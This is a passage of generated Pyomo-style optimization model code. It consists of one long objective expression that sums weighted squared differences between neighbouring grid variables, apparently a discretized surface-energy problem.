m.x997 - 1.3*m.x996)**2) + 2.82949687968474*((8.11690209768664*m.x1024 - 8.11690209768664*m.x997)
**2 + (1.3*m.x998 - 1.3*m.x997)**2) + 2.82949687968474*((8.11690209768664*m.x1025 -
8.11690209768664*m.x998)**2 + (1.3*m.x999 - 1.3*m.x998)**2) + 2.93626457097387*((8.11690209768664
*m.x1027 - 8.11690209768664*m.x1000)**2 + (1.3*m.x1001 - 1.3*m.x1000)**2) + 2.93626457097387*((
8.11690209768664*m.x1028 - 8.11690209768664*m.x1001)**2 + (1.3*m.x1002 - 1.3*m.x1001)**2) +
2.93626457097387*((8.11690209768664*m.x1029 - 8.11690209768664*m.x1002)**2 + (1.3*m.x1003 - 1.3*
m.x1002)**2) + 2.93626457097387*((8.11690209768664*m.x1030 - 8.11690209768664*m.x1003)**2 + (1.3*
m.x1004 - 1.3*m.x1003)**2) + 2.93626457097387*((8.11690209768664*m.x1031 - 8.11690209768664*
m.x1004)**2 + (1.3*m.x1005 - 1.3*m.x1004)**2) + 2.93626457097387*((8.11690209768664*m.x1032 -
8.11690209768664*m.x1005)**2 + (1.3*m.x1006 - 1.3*m.x1005)**2) + 2.93626457097387*((
8.11690209768664*m.x1033 - 8.11690209768664*m.x1006)**2 + (1.3*m.x1007 - 1.3*m.x1006)**2) +
2.93626457097387*((8.11690209768664*m.x1034 - 8.11690209768664*m.x1007)**2 + (1.3*m.x1008 - 1.3*
m.x1007)**2) + 2.93626457097387*((8.11690209768664*m.x1035 - 8.11690209768664*m.x1008)**2 + (1.3*
m.x1009 - 1.3*m.x1008)**2) + 2.93626457097387*((8.11690209768664*m.x1036 - 8.11690209768664*
m.x1009)**2 + (1.3*m.x1010 - 1.3*m.x1009)**2) + 2.93626457097387*((8.11690209768664*m.x1037 -
8.11690209768664*m.x1010)**2 + (1.3*m.x1011 - 1.3*m.x1010)**2) + 2.93626457097387*((
8.11690209768664*m.x1038 - 8.11690209768664*m.x1011)**2 + (1.3*m.x1012 - 1.3*m.x1011)**2) +
2.93626457097387*((8.11690209768664*m.x1039 - 8.11690209768664*m.x1012)**2 + (1.3*m.x1013 - 1.3*
m.x1012)**2) + 2.93626457097387*((8.11690209768664*m.x1040 - 8.11690209768664*m.x1013)**2 + (1.3*
m.x1014 - 1.3*m.x1013)**2) + 2.93626457097387*((8.11690209768664*m.x1041 - 8.11690209768664*
m.x1014)**2 + (1.3*m.x1015 - 1.3*m.x1014)**2) + 2.93626457097387*((8.11690209768664*m.x1042 -
8.11690209768664*m.x1015)**2 + (1.3*m.x1016 - 1.3*m.x1015)**2) + 2.93626457097387*((
8.11690209768664*m.x1043 - 8.11690209768664*m.x1016)**2 + (1.3*m.x1017 - 1.3*m.x1016)**2) +
2.93626457097387*((8.11690209768664*m.x1044 - 8.11690209768664*m.x1017)**2 + (1.3*m.x1018 - 1.3*
m.x1017)**2) + 2.93626457097387*((8.11690209768664*m.x1045 - 8.11690209768664*m.x1018)**2 + (1.3*
m.x1019 - 1.3*m.x1018)**2) + 2.93626457097387*((8.11690209768664*m.x1046 - 8.11690209768664*
m.x1019)**2 + (1.3*m.x1020 - 1.3*m.x1019)**2) + 2.93626457097387*((8.11690209768664*m.x1047 -
8.11690209768664*m.x1020)**2 + (1.3*m.x1021 - 1.3*m.x1020)**2) + 2.93626457097387*((
8.11690209768664*m.x1048 - 8.11690209768664*m.x1021)**2 + (1.3*m.x1022 - 1.3*m.x1021)**2) +
2.93626457097387*((8.11690209768664*m.x1049 - 8.11690209768664*m.x1022)**2 + (1.3*m.x1023 - 1.3*
m.x1022)**2) + 2.93626457097387*((8.11690209768664*m.x1050 - 8.11690209768664*m.x1023)**2 + (1.3*
m.x1024 - 1.3*m.x1023)**2) + 2.93626457097387*((8.11690209768664*m.x1051 - 8.11690209768664*
m.x1024)**2 + (1.3*m.x1025 - 1.3*m.x1024)**2) + 2.93626457097387*((8.11690209768664*m.x1052 -
8.11690209768664*m.x1025)**2 + (1.3*m.x1026 - 1.3*m.x1025)**2) + 3.04666329702967*((
8.11690209768664*m.x1054 - 8.11690209768664*m.x1027)**2 + (1.3*m.x1028 - 1.3*m.x1027)**2) +
3.04666329702967*((8.11690209768664*m.x1055 - 8.11690209768664*m.x1028)**2 + (1.3*m.x1029 - 1.3*
m.x1028)**2) + 3.04666329702967*((8.11690209768664*m.x1056 - 8.11690209768664*m.x1029)**2 + (1.3*
m.x1030 - 1.3*m.x1029)**2) + 3.04666329702967*((8.11690209768664*m.x1057 - 8.11690209768664*
m.x1030)**2 + (1.3*m.x1031 - 1.3*m.x1030)**2) + 3.04666329702967*((8.11690209768664*m.x1058 -
8.11690209768664*m.x1031)**2 + (1.3*m.x1032 - 1.3*m.x1031)**2) + 3.04666329702967*((
8.11690209768664*m.x1059 - 8.11690209768664*m.x1032)**2 + (1.3*m.x1033 - 1.3*m.x1032)**2) +
3.04666329702967*((8.11690209768664*m.x1060 - 8.11690209768664*m.x1033)**2 + (1.3*m.x1034 - 1.3*
m.x1033)**2) + 3.04666329702967*((8.11690209768664*m.x1061 - 8.11690209768664*m.x1034)**2 + (1.3*
m.x1035 - 1.3*m.x1034)**2) + 3.04666329702967*((8.11690209768664*m.x1062 - 8.11690209768664*
m.x1035)**2 + (1.3*m.x1036 - 1.3*m.x1035)**2) + 3.04666329702967*((8.11690209768664*m.x1063 -
8.11690209768664*m.x1036)**2 + (1.3*m.x1037 - 1.3*m.x1036)**2) + 3.04666329702967*((
8.11690209768664*m.x1064 - 8.11690209768664*m.x1037)**2 + (1.3*m.x1038 - 1.3*m.x1037)**2) +
3.04666329702967*((8.11690209768664*m.x1065 - 8.11690209768664*m.x1038)**2 + (1.3*m.x1039 - 1.3*
m.x1038)**2) + 3.04666329702967*((8.11690209768664*m.x1066 - 8.11690209768664*m.x1039)**2 + (1.3*
m.x1040 - 1.3*m.x1039)**2) + 3.04666329702967*((8.11690209768664*m.x1067 - 8.11690209768664*
m.x1040)**2 + (1.3*m.x1041 - 1.3*m.x1040)**2) + 3.04666329702967*((8.11690209768664*m.x1068 -
8.11690209768664*m.x1041)**2 + (1.3*m.x1042 - 1.3*m.x1041)**2) + 3.04666329702967*((
8.11690209768664*m.x1069 - 8.11690209768664*m.x1042)**2 + (1.3*m.x1043 - 1.3*m.x1042)**2) +
3.04666329702967*((8.11690209768664*m.x1070 - 8.11690209768664*m.x1043)**2 + (1.3*m.x1044 - 1.3*
m.x1043)**2) + 3.04666329702967*((8.11690209768664*m.x1071 - 8.11690209768664*m.x1044)**2 + (1.3*
m.x1045 - 1.3*m.x1044)**2) + 3.04666329702967*((8.11690209768664*m.x1072 - 8.11690209768664*
m.x1045)**2 + (1.3*m.x1046 - 1.3*m.x1045)**2) + 3.04666329702967*((8.11690209768664*m.x1073 -
8.11690209768664*m.x1046)**2 + (1.3*m.x1047 - 1.3*m.x1046)**2) + 3.04666329702967*((
8.11690209768664*m.x1074 - 8.11690209768664*m.x1047)**2 + (1.3*m.x1048 - 1.3*m.x1047)**2) +
3.04666329702967*((8.11690209768664*m.x1075 - 8.11690209768664*m.x1048)**2 + (1.3*m.x1049 - 1.3*
m.x1048)**2) + 3.04666329702967*((8.11690209768664*m.x1076 - 8.11690209768664*m.x1049)**2 + (1.3*
m.x1050 - 1.3*m.x1049)**2) + 3.04666329702967*((8.11690209768664*m.x1077 - 8.11690209768664*
m.x1050)**2 + (1.3*m.x1051 - 1.3*m.x1050)**2) + 3.04666329702967*((8.11690209768664*m.x1078 -
8.11690209768664*m.x1051)**2 + (1.3*m.x1052 - 1.3*m.x1051)**2) + 3.04666329702967*((
8.11690209768664*m.x1079 - 8.11690209768664*m.x1052)**2 + (1.3*m.x1053 - 1.3*m.x1052)**2) +
3.15906217094175*((8.11690209768664*m.x1081 - 8.11690209768664*m.x1054)**2 + (1.3*m.x1055 - 1.3*
m.x1054)**2) + 3.15906217094175*((8.11690209768664*m.x1082 - 8.11690209768664*m.x1055)**2 + (1.3*
m.x1056 - 1.3*m.x1055)**2) + 3.15906217094175*((8.11690209768664*m.x1083 - 8.11690209768664*
m.x1056)**2 + (1.3*m.x1057 - 1.3*m.x1056)**2) + 3.15906217094175*((8.11690209768664*m.x1084 -
8.11690209768664*m.x1057)**2 + (1.3*m.x1058 - 1.3*m.x1057)**2) + 3.15906217094175*((
8.11690209768664*m.x1085 - 8.11690209768664*m.x1058)**2 + (1.3*m.x1059 - 1.3*m.x1058)**2) +
3.15906217094175*((8.11690209768664*m.x1086 - 8.11690209768664*m.x1059)**2 + (1.3*m.x1060 - 1.3*
m.x1059)**2) + 3.15906217094175*((8.11690209768664*m.x1087 - 8.11690209768664*m.x1060)**2 + (1.3*
m.x1061 - 1.3*m.x1060)**2) + 3.15906217094175*((8.11690209768664*m.x1088 - 8.11690209768664*
m.x1061)**2 + (1.3*m.x1062 - 1.3*m.x1061)**2) + 3.15906217094175*((8.11690209768664*m.x1089 -
8.11690209768664*m.x1062)**2 + (1.3*m.x1063 - 1.3*m.x1062)**2) + 3.15906217094175*((
8.11690209768664*m.x1090 - 8.11690209768664*m.x1063)**2 + (1.3*m.x1064 - 1.3*m.x1063)**2) +
3.15906217094175*((8.11690209768664*m.x1091 - 8.11690209768664*m.x1064)**2 + (1.3*m.x1065 - 1.3*
m.x1064)**2) + 3.15906217094175*((8.11690209768664*m.x1092 - 8.11690209768664*m.x1065)**2 + (1.3*
m.x1066 - 1.3*m.x1065)**2) + 3.15906217094175*((8.11690209768664*m.x1093 - 8.11690209768664*
m.x1066)**2 + (1.3*m.x1067 - 1.3*m.x1066)**2) + 3.15906217094175*((8.11690209768664*m.x1094 -
8.11690209768664*m.x1067)**2 + (1.3*m.x1068 - 1.3*m.x1067)**2) + 3.15906217094175*((
8.11690209768664*m.x1095 - 8.11690209768664*m.x1068)**2 + (1.3*m.x1069 - 1.3*m.x1068)**2) +
3.15906217094175*((8.11690209768664*m.x1096 - 8.11690209768664*m.x1069)**2 + (1.3*m.x1070 - 1.3*
m.x1069)**2) + 3.15906217094175*((8.11690209768664*m.x1097 - 8.11690209768664*m.x1070)**2 + (1.3*
m.x1071 - 1.3*m.x1070)**2) + 3.15906217094175*((8.11690209768664*m.x1098 - 8.11690209768664*
m.x1071)**2 + (1.3*m.x1072 - 1.3*m.x1071)**2) + 3.15906217094175*((8.11690209768664*m.x1099 -
8.11690209768664*m.x1072)**2 + (1.3*m.x1073 - 1.3*m.x1072)**2) + 3.15906217094175*((
8.11690209768664*m.x1100 - 8.11690209768664*m.x1073)**2 + (1.3*m.x1074 - 1.3*m.x1073)**2) +
3.15906217094175*((8.11690209768664*m.x1101 - 8.11690209768664*m.x1074)**2 + (1.3*m.x1075 - 1.3*
m.x1074)**2) + 3.15906217094175*((8.11690209768664*m.x1102 - 8.11690209768664*m.x1075)**2 + (1.3*
m.x1076 - 1.3*m.x1075)**2) + 3.15906217094175*((8.11690209768664*m.x1103 - 8.11690209768664*
m.x1076)**2 + (1.3*m.x1077 - 1.3*m.x1076)**2) + 3.15906217094175*((8.11690209768664*m.x1104 -
8.11690209768664*m.x1077)**2 + (1.3*m.x1078 - 1.3*m.x1077)**2) + 3.15906217094175*((
8.11690209768664*m.x1105 - 8.11690209768664*m.x1078)**2 + (1.3*m.x1079 - 1.3*m.x1078)**2) +
3.15906217094175*((8.11690209768664*m.x1106 - 8.11690209768664*m.x1079)**2 + (1.3*m.x1080 - 1.3*
m.x1079)**2) + 3.27167662312136*((8.11690209768664*m.x1108 - 8.11690209768664*m.x1081)**2 + (1.3*
m.x1082 - 1.3*m.x1081)**2) + 3.27167662312136*((8.11690209768664*m.x1109 - 8.11690209768664*
m.x1082)**2 + (1.3*m.x1083 - 1.3*m.x1082)**2) + 3.27167662312136*((8.11690209768664*m.x1110 -
8.11690209768664*m.x1083)**2 + (1.3*m.x1084 - 1.3*m.x1083)**2) + 3.27167662312136*((
8.11690209768664*m.x1111 - 8.11690209768664*m.x1084)**2 + (1.3*m.x1085 - 1.3*m.x1084)**2) +
3.27167662312136*((8.11690209768664*m.x1112 - 8.11690209768664*m.x1085)**2 + (1.3*m.x1086 - 1.3*
m.x1085)**2) + 3.27167662312136*((8.11690209768664*m.x1113 - 8.11690209768664*m.x1086)**2 + (1.3*
m.x1087 - 1.3*m.x1086)**2) + 3.27167662312136*((8.11690209768664*m.x1114 - 8.11690209768664*
m.x1087)**2 + (1.3*m.x1088 - 1.3*m.x1087)**2) + 3.27167662312136*((8.11690209768664*m.x1115 -
8.11690209768664*m.x1088)**2 + (1.3*m.x1089 - 1.3*m.x1088)**2) + 3.27167662312136*((
8.11690209768664*m.x1116 - 8.11690209768664*m.x1089)**2 + (1.3*m.x1090 - 1.3*m.x1089)**2) +
3.27167662312136*((8.11690209768664*m.x1117 - 8.11690209768664*m.x1090)**2 + (1.3*m.x1091 - 1.3*
m.x1090)**2) + 3.27167662312136*((8.11690209768664*m.x1118 - 8.11690209768664*m.x1091)**2 + (1.3*
m.x1092 - 1.3*m.x1091)**2) + 3.27167662312136*((8.11690209768664*m.x1119 - 8.11690209768664*
m.x1092)**2 + (1.3*m.x1093 - 1.3*m.x1092)**2) + 3.27167662312136*((8.11690209768664*m.x1120 -
8.11690209768664*m.x1093)**2 + (1.3*m.x1094 - 1.3*m.x1093)**2) + 3.27167662312136*((
8.11690209768664*m.x1121 - 8.11690209768664*m.x1094)**2 + (1.3*m.x1095 - 1.3*m.x1094)**2) +
3.27167662312136*((8.11690209768664*m.x1122 - 8.11690209768664*m.x1095)**2 + (1.3*m.x1096 - 1.3*
m.x1095)**2) + 3.27167662312136*((8.11690209768664*m.x1123 - 8.11690209768664*m.x1096)**2 + (1.3*
m.x1097 - 1.3*m.x1096)**2) + 3.27167662312136*((8.11690209768664*m.x1124 - 8.11690209768664*
m.x1097)**2 + (1.3*m.x1098 - 1.3*m.x1097)**2) + 3.27167662312136*((8.11690209768664*m.x1125 -
8.11690209768664*m.x1098)**2 + (1.3*m.x1099 - 1.3*m.x1098)**2) + 3.27167662312136*((
8.11690209768664*m.x1126 - 8.11690209768664*m.x1099)**2 + (1.3*m.x1100 - 1.3*m.x1099)**2) +
3.27167662312136*((8.11690209768664*m.x1127 - 8.11690209768664*m.x1100)**2 + (1.3*m.x1101 - 1.3*
m.x1100)**2) + 3.27167662312136*((8.11690209768664*m.x1128 - 8.11690209768664*m.x1101)**2 + (1.3*
m.x1102 - 1.3*m.x1101)**2) + 3.27167662312136*((8.11690209768664*m.x1129 - 8.11690209768664*
m.x1102)**2 + (1.3*m.x1103 - 1.3*m.x1102)**2) + 3.27167662312136*((8.11690209768664*m.x1130 -
8.11690209768664*m.x1103)**2 + (1.3*m.x1104 - 1.3*m.x1103)**2) + 3.27167662312136*((
8.11690209768664*m.x1131 - 8.11690209768664*m.x1104)**2 + (1.3*m.x1105 - 1.3*m.x1104)**2) +
3.27167662312136*((8.11690209768664*m.x1132 - 8.11690209768664*m.x1105)**2 + (1.3*m.x1106 - 1.3*
m.x1105)**2) + 3.27167662312136*((8.11690209768664*m.x1133 - 8.11690209768664*m.x1106)**2 + (1.3*
m.x1107 - 1.3*m.x1106)**2) + 3.38259803840007*((8.11690209768664*m.x1135 - 8.11690209768664*
m.x1108)**2 + (1.3*m.x1109 - 1.3*m.x1108)**2) + 3.38259803840007*((8.11690209768664*m.x1136 -
8.11690209768664*m.x1109)**2 + (1.3*m.x1110 - 1.3*m.x1109)**2) + 3.38259803840007*((
8.11690209768664*m.x1137 - 8.11690209768664*m.x1110)**2 + (1.3*m.x1111 - 1.3*m.x1110)**2) +
3.38259803840007*((8.11690209768664*m.x1138 - 8.11690209768664*m.x1111)**2 + (1.3*m.x1112 - 1.3*
m.x1111)**2) + 3.38259803840007*((8.11690209768664*m.x1139 - 8.11690209768664*m.x1112)**2 + (1.3*
m.x1113 - 1.3*m.x1112)**2) + 3.38259803840007*((8.11690209768664*m.x1140 - 8.11690209768664*
m.x1113)**2 + (1.3*m.x1114 - 1.3*m.x1113)**2) + 3.38259803840007*((8.11690209768664*m.x1141 -
8.11690209768664*m.x1114)**2 + (1.3*m.x1115 - 1.3*m.x1114)**2) + 3.38259803840007*((
8.11690209768664*m.x1142 - 8.11690209768664*m.x1115)**2 + (1.3*m.x1116 - 1.3*m.x1115)**2) +
3.38259803840007*((8.11690209768664*m.x1143 - 8.11690209768664*m.x1116)**2 + (1.3*m.x1117 - 1.3*
m.x1116)**2) + 3.38259803840007*((8.11690209768664*m.x1144 - 8.11690209768664*m.x1117)**2 + (1.3*
m.x1118 - 1.3*m.x1117)**2) + 3.38259803840007*((8.11690209768664*m.x1145 - 8.11690209768664*
m.x1118)**2 + (1.3*m.x1119 - 1.3*m.x1118)**2) + 3.38259803840007*((8.11690209768664*m.x1146 -
8.11690209768664*m.x1119)**2 + (1.3*m.x1120 - 1.3*m.x1119)**2) + 3.38259803840007*((
8.11690209768664*m.x1147 - 8.11690209768664*m.x1120)**2 + (1.3*m.x1121 - 1.3*m.x1120)**2) +
3.38259803840007*((8.11690209768664*m.x1148 - 8.11690209768664*m.x1121)**2 + (1.3*m.x1122 - 1.3*
m.x1121)**2) + 3.38259803840007*((8.11690209768664*m.x1149 - 8.11690209768664*m.x1122)**2 + (1.3*
m.x1123 - 1.3*m.x1122)**2) + 3.38259803840007*((8.11690209768664*m.x1150 - 8.11690209768664*
m.x1123)**2 + (1.3*m.x1124 - 1.3*m.x1123)**2) + 3.38259803840007*((8.11690209768664*m.x1151 -
8.11690209768664*m.x1124)**2 + (1.3*m.x1125 - 1.3*m.x1124)**2) + 3.38259803840007*((
8.11690209768664*m.x1152 - 8.11690209768664*m.x1125)**2 + (1.3*m.x1126 - 1.3*m.x1125)**2) +
3.38259803840007*((8.11690209768664*m.x1153 - 8.11690209768664*m.x1126)**2 + (1.3*m.x1127 - 1.3*
m.x1126)**2) + 3.38259803840007*((8.11690209768664*m.x1154 - 8.11690209768664*m.x1127)**2 + (1.3*
m.x1128 - 1.3*m.x1127)**2) + 3.38259803840007*((8.11690209768664*m.x1155 - 8.11690209768664*
m.x1128)**2 + (1.3*m.x1129 - 1.3*m.x1128)**2) + 3.38259803840007*((8.11690209768664*m.x1156 -
8.11690209768664*m.x1129)**2 + (1.3*m.x1130 - 1.3*m.x1129)**2) + 3.38259803840007*((
8.11690209768664*m.x1157 - 8.11690209768664*m.x1130)**2 + (1.3*m.x1131 - 1.3*m.x1130)**2) +
3.38259803840007*((8.11690209768664*m.x1158 - 8.11690209768664*m.x1131)**2 + (1.3*m.x1132 - 1.3*
m.x1131)**2) + 3.38259803840007*((8.11690209768664*m.x1159 - 8.11690209768664*m.x1132)**2 + (1.3*
m.x1133 - 1.3*m.x1132)**2) + 3.38259803840007*((8.11690209768664*m.x1160 - 8.11690209768664*
m.x1133)**2 + (1.3*m.x1134 - 1.3*m.x1133)**2) + 3.48983301616632*((8.11690209768664*m.x1162 -
8.11690209768664*m.x1135)**2 + (1.3*m.x1136 - 1.3*m.x1135)**2) + 3.48983301616632*((
8.11690209768664*m.x1163 - 8.11690209768664*m.x1136)**2 + (1.3*m.x1137 - 1.3*m.x1136)**2) +
3.48983301616632*((8.11690209768664*m.x1164 - 8.11690209768664*m.x1137)**2 + (1.3*m.x1138 - 1.3*
m.x1137)**2) + 3.48983301616632*((8.11690209768664*m.x1165 - 8.11690209768664*m.x1138)**2 + (1.3*
m.x1139 - 1.3*m.x1138)**2) + 3.48983301616632*((8.11690209768664*m.x1166 - 8.11690209768664*
m.x1139)**2 + (1.3*m.x1140 - 1.3*m.x1139)**2) + 3.48983301616632*((8.11690209768664*m.x1167 -
8.11690209768664*m.x1140)**2 + (1.3*m.x1141 - 1.3*m.x1140)**2) + 3.48983301616632*((
8.11690209768664*m.x1168 - 8.11690209768664*m.x1141)**2 + (1.3*m.x1142 - 1.3*m.x1141)**2) +
3.48983301616632*((8.11690209768664*m.x1169 - 8.11690209768664*m.x1142)**2 + (1.3*m.x1143 - 1.3*
m.x1142)**2) + 3.48983301616632*((8.11690209768664*m.x1170 - 8.11690209768664*m.x1143)**2 + (1.3*
m.x1144 - 1.3*m.x1143)**2) + 3.48983301616632*((8.11690209768664*m.x1171 - 8.11690209768664*
m.x1144)**2 + (1.3*m.x1145 - 1.3*m.x1144)**2) + 3.48983301616632*((8.11690209768664*m.x1172 -
8.11690209768664*m.x1145)**2 + (1.3*m.x1146 - 1.3*m.x1145)**2) + 3.48983301616632*((
8.11690209768664*m.x1173 - 8.11690209768664*m.x1146)**2 + (1.3*m.x1147 - 1.3*m.x1146)**2) +
3.48983301616632*((8.11690209768664*m.x1174 - 8.11690209768664*m.x1147)**2 + (1.3*m.x1148 - 1.3*
m.x1147)**2) + 3.48983301616632*((8.11690209768664*m.x1175 - 8.11690209768664*m.x1148)**2 + (1.3*
m.x1149 - 1.3*m.x1148)**2) + 3.48983301616632*((8.11690209768664*m.x1176 - 8.11690209768664*
m.x1149)**2 + (1.3*m.x1150 - 1.3*m.x1149)**2) + 3.48983301616632*((8.11690209768664*m.x1177 -
8.11690209768664*m.x1150)**2 + (1.3*m.x1151 - 1.3*m.x1150)**2) + 3.48983301616632*((
8.11690209768664*m.x1178 - 8.11690209768664*m.x1151)**2 + (1.3*m.x1152 - 1.3*m.x1151)**2) +
3.48983301616632*((8.11690209768664*m.x1179 - 8.11690209768664*m.x1152)**2 + (1.3*m.x1153 - 1.3*
m.x1152)**2) + 3.48983301616632*((8.11690209768664*m.x1180 - 8.11690209768664*m.x1153)**2 + (1.3*
m.x1154 - 1.3*m.x1153)**2) + 3.48983301616632*((8.11690209768664*m.x1181 - 8.11690209768664*
m.x1154)**2 + (1.3*m.x1155 - 1.3*m.x1154)**2) + 3.48983301616632*((8.11690209768664*m.x1182 -
8.11690209768664*m.x1155)**2 + (1.3*m.x1156 - 1.3*m.x1155)**2) + 3.48983301616632*((
8.11690209768664*m.x1183 - 8.11690209768664*m.x1156)**2 + (1.3*m.x1157 - 1.3*m.x1156)**2) +
3.48983301616632*((8.11690209768664*m.x1184 - 8.11690209768664*m.x1157)**2 + (1.3*m.x1158 - 1.3*
m.x1157)**2) + 3.48983301616632*((8.11690209768664*m.x1185 - 8.11690209768664*m.x1158)**2 + (1.3*
m.x1159 - 1.3*m.x1158)**2) + 3.48983301616632*((8.11690209768664*m.x1186 - 8.11690209768664*
m.x1159)**2 + (1.3*m.x1160 - 1.3*m.x1159)**2) + 3.48983301616632*((8.11690209768664*m.x1187 -
8.11690209768664*m.x1160)**2 + (1.3*m.x1161 - 1.3*m.x1160)**2) + 3.5913512836022*((
8.11690209768664*m.x1189 - 8.11690209768664*m.x1162)**2 + (1.3*m.x1163 - 1.3*m.x1162)**2) +
3.5913512836022*((8.11690209768664*m.x1190 - 8.11690209768664*m.x1163)**2 + (1.3*m.x1164 - 1.3*
m.x1163)**2) + 3.5913512836022*((8.11690209768664*m.x1191 - 8.11690209768664*m.x1164)**2 + (1.3*
m.x1165 - 1.3*m.x1164)**2) + 3.5913512836022*((8.11690209768664*m.x1192 - 8.11690209768664*
m.x1165)**2 + (1.3*m.x1166 - 1.3*m.x1165)**2) + 3.5913512836022*((8.11690209768664*m.x1193 -
8.11690209768664*m.x1166)**2 + (1.3*m.x1167 - 1.3*m.x1166)**2) + 3.5913512836022*((
8.11690209768664*m.x1194 - 8.11690209768664*m.x1167)**2 + (1.3*m.x1168 - 1.3*m.x1167)**2) +
3.5913512836022*((8.11690209768664*m.x1195 - 8.11690209768664*m.x1168)**2 + (1.3*m.x1169 - 1.3*
m.x1168)**2) + 3.5913512836022*((8.11690209768664*m.x1196 - 8.11690209768664*m.x1169)**2 + (1.3*
m.x1170 - 1.3*m.x1169)**2) + 3.5913512836022*((8.11690209768664*m.x1197 - 8.11690209768664*
m.x1170)**2 + (1.3*m.x1171 - 1.3*m.x1170)**2) + 3.5913512836022*((8.11690209768664*m.x1198 -
8.11690209768664*m.x1171)**2 + (1.3*m.x1172 - 1.3*m.x1171)**2) + 3.5913512836022*((
8.11690209768664*m.x1199 - 8.11690209768664*m.x1172)**2 + (1.3*m.x1173 - 1.3*m.x1172)**2) +
3.5913512836022*((8.11690209768664*m.x1200 - 8.11690209768664*m.x1173)**2 + (1.3*m.x1174 - 1.3*
m.x1173)**2) + 3.5913512836022*((8.11690209768664*m.x1201 - 8.11690209768664*m.x1174)**2 + (1.3*
m.x1175 - 1.3*m.x1174)**2) + 3.5913512836022*((8.11690209768664*m.x1202 - 8.11690209768664*
m.x1175)**2 + (1.3*m.x1176 - 1.3*m.x1175)**2) + 3.5913512836022*((8.11690209768664*m.x1203 -
8.11690209768664*m.x1176)**2 + (1.3*m.x1177 - 1.3*m.x1176)**2) + 3.5913512836022*((
8.11690209768664*m.x1204 - 8.11690209768664*m.x1177)**2 + (1.3*m.x1178 - 1.3*m.x1177)**2) +
3.5913512836022*((8.11690209768664*m.x1205 - 8.11690209768664*m.x1178)**2 + (1.3*m.x1179 - 1.3*
m.x1178)**2) + 3.5913512836022*((8.11690209768664*m.x1206 - 8.11690209768664*m.x1179)**2 + (1.3*
m.x1180 - 1.3*m.x1179)**2) + 3.5913512836022*((8.11690209768664*m.x1207 - 8.11690209768664*
m.x1180)**2 + (1.3*m.x1181 - 1.3*m.x1180)**2) + 3.5913512836022*((8.11690209768664*m.x1208 -
8.11690209768664*m.x1181)**2 + (1.3*m.x1182 - 1.3*m.x1181)**2) + 3.5913512836022*((
8.11690209768664*m.x1209 - 8.11690209768664*m.x1182)**2 + (1.3*m.x1183 - 1.3*m.x1182)**2) +
3.5913512836022*((8.11690209768664*m.x1210 - 8.11690209768664*m.x1183)**2 + (1.3*m.x1184 - 1.3*
m.x1183)**2) + 3.5913512836022*((8.11690209768664*m.x1211 - 8.11690209768664*m.x1184)**2 + (1.3*
m.x1185 - 1.3*m.x1184)**2) + 3.5913512836022*((8.11690209768664*m.x1212 - 8.11690209768664*
m.x1185)**2 + (1.3*m.x1186 - 1.3*m.x1185)**2) + 3.5913512836022*((8.11690209768664*m.x1213 -
8.11690209768664*m.x1186)**2 + (1.3*m.x1187 - 1.3*m.x1186)**2) + 3.5913512836022*((
8.11690209768664*m.x1214 - 8.11690209768664*m.x1187)**2 + (1.3*m.x1188 - 1.3*m.x1187)**2) +
3.68514062185326*((8.11690209768664*m.x1216 - 8.11690209768664*m.x1189)**2 + (1.3*m.x1190 - 1.3*
m.x1189)**2) + 3.68514062185326*((8.11690209768664*m.x1217 - 8.11690209768664*m.x1190)**2 + (1.3*
m.x1191 - 1.3*m.x1190)**2) + 3.68514062185326*((8.11690209768664*m.x1218 - 8.11690209768664*
m.x1191)**2 + (1.3*m.x1192 - 1.3*m.x1191)**2) + 3.68514062185326*((8.11690209768664*m.x1219 -
8.11690209768664*m.x1192)**2 + (1.3*m.x1193 - 1.3*m.x1192)**2) + 3.68514062185326*((
8.11690209768664*m.x1220 - 8.11690209768664*m.x1193)**2 + (1.3*m.x1194 - 1.3*m.x1193)**2) +
3.68514062185326*((8.11690209768664*m.x1221 - 8.11690209768664*m.x1194)**2 + (1.3*m.x1195 - 1.3*
m.x1194)**2) + 3.68514062185326*((8.11690209768664*m.x1222 - 8.11690209768664*m.x1195)**2 + (1.3*
m.x1196 - 1.3*m.x1195)**2) + 3.68514062185326*((8.11690209768664*m.x1223 - 8.11690209768664*
m.x1196)**2 + (1.3*m.x1197 - 1.3*m.x1196)**2) + 3.68514062185326*((8.11690209768664*m.x1224 -
8.11690209768664*m.x1197)**2 + (1.3*m.x1198 - 1.3*m.x1197)**2) + 3.68514062185326*((
8.11690209768664*m.x1225 - 8.11690209768664*m.x1198)**2 + (1.3*m.x1199 - 1.3*m.x1198)**2) +
3.68514062185326*((8.11690209768664*m.x1226 - 8.11690209768664*m.x1199)**2 + (1.3*m.x1200 - 1.3*
m.x1199)**2) + 3.68514062185326*((8.11690209768664*m.x1227 - 8.11690209768664*m.x1200)**2 + (1.3*
m.x1201 - 1.3*m.x1200)**2) + 3.68514062185326*((8.11690209768664*m.x1228 - 8.11690209768664*
m.x1201)**2 + (1.3*m.x1202 - 1.3*m.x1201)**2) + 3.68514062185326*((8.11690209768664*m.x1229 -
8.11690209768664*m.x1202)**2 + (1.3*m.x1203 - 1.3*m.x1202)**2) + 3.68514062185326*((
8.11690209768664*m.x1230 - 8.11690209768664*m.x1203)**2 + (1.3*m.x1204 - 1.3*m.x1203)**2) +
3.68514062185326*((8.11690209768664*m.x1231 - 8.11690209768664*m.x1204)**2 + (1.3*m.x1205 - 1.3*
m.x1204)**2) + 3.68514062185326*((8.11690209768664*m.x1232 - 8.11690209768664*m.x1205)**2 + (1.3*
m.x1206 - 1.3*m.x1205)**2) + 3.68514062185326*((8.11690209768664*m.x1233 - 8.11690209768664*
m.x1206)**2 + (1.3*m.x1207 - 1.3*m.x1206)**2) + 3.68514062185326*((8.11690209768664*m.x1234 -
8.11690209768664*m.x1207)**2 + (1.3*m.x1208 - 1.3*m.x1207)**2) + 3.68514062185326*((
8.11690209768664*m.x1235 - 8.11690209768664*m.x1208)**2 + (1.3*m.x1209 - 1.3*m.x1208)**2) +
3.68514062185326*((8.11690209768664*m.x1236 - 8.11690209768664*m.x1209)**2 + (1.3*m.x1210 - 1.3*
m.x1209)**2) + 3.68514062185326*((8.11690209768664*m.x1237 - 8.11690209768664*m.x1210)**2 + (1.3*
m.x1211 - 1.3*m.x1210)**2) + 3.68514062185326*((8.11690209768664*m.x1238 - 8.11690209768664*
m.x1211)**2 + (1.3*m.x1212 - 1.3*m.x1211)**2) + 3.68514062185326*((8.11690209768664*m.x1239 -
8.11690209768664*m.x1212)**2 + (1.3*m.x1213 - 1.3*m.x1212)**2) + 3.68514062185326*((
